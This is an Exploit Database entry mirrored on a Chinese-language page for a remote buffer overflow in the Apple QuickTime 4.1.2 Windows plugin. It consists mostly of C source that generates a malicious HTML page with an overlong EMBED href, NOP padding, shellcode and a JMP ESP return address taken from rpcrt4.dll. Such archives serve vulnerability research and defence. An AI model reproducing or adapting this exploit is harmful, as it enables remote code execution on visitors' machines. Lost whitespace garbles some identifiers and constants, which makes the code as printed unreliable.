Apple QuickTime plugin – Windows 4.1.2 (Japanese) Remote Overflow

• Exploit Database
• 120 阅读

• 作者： UNYUN
  日期： 2012-08-18
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/20605/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101

  source: https://www.securityfocus.com/bid/2328/info   Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow.   A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code.   /*==================================================================== Apple QuickTime 4.1.2 plug-in exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ==================================================================== */   #include<stdio.h> #include<stdlib.h> #include<windows.h>   #define MOV_FILE"c:\\program files\\quicktime\\sample.mov" #define HEIGHT60 #define WIDTH 60 #define TARGET"QUICKTIMEPLAYER" #define FILE_IMAGE\ "<html><embed src=\"%s\" href=\"%s\" "\ "width=%d height=%d autoplay=\"true\" "\ "target=\"%s\"><br></html>" #define BUFSIZE 730 #define RET 684 #define ESP_TGT "rpcrt4.dll" #define JMPESP_10xff #define JMPESP_20xe4 #define NOP 0x90   unsigned char exploit_code[200]={ 0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50, 0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48, 0xFF,0xD0,0x00, };   main(int argc,char *argv[]) { FILE*fp; charbuf[BUFSIZE]; unsigned inti,pretadr,p,ip,kp; MEMORY_BASIC_INFORMATION meminfo;   if (argc<2){ printf("usage : %s Output_HTML-fileName [Sample .mov file]\n", argv[0]); exit(1); }   if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){ printf("%s is not found.\n",ESP_TGT); exit(1); }   VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION)); pretadr=0; for (i=0;i<meminfo.RegionSize;i++){ p=kp+i; if (( p &0xff)==0 || ((p>>8 )&0xff)==0 || ((p>>16)&0xff)==0 || ((p>>24)&0xff)==0) continue; if ( *((unsigned char *)p)==JMPESP_1 && *(((unsigned char *)p)+1)==JMPESP_2) pretadr=p; } if ((fp=fopen(argv[1],"wb"))==NULL){ printf("File write error \"%s\"\n",argv[1]); exit(1); } memset(buf,NOP,BUFSIZE); memcpy(buf+700-12,exploit_code,strlen(exploit_code)); buf[BUFSIZE-2]=0;   ip=pretadr; printf("EIP=%x\n",ip); buf[RET]=ip&0xff; buf[RET+1]=(ip>>8)&0xff; buf[RET+2]=(ip>>16)&0xff; buf[RET+3]=(ip>>24)&0xff;   if (argc==2) fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET); else fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET); fclose(fp); printf("Done.\n"); }   ----- UNYUN % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]   shadowpenguin@backsection.net (SPS-Official) unyun@shadowpenguin.org (Personal) % eEye Digital Security Team [ http://www.eEye.com ]   unyun@eEye.com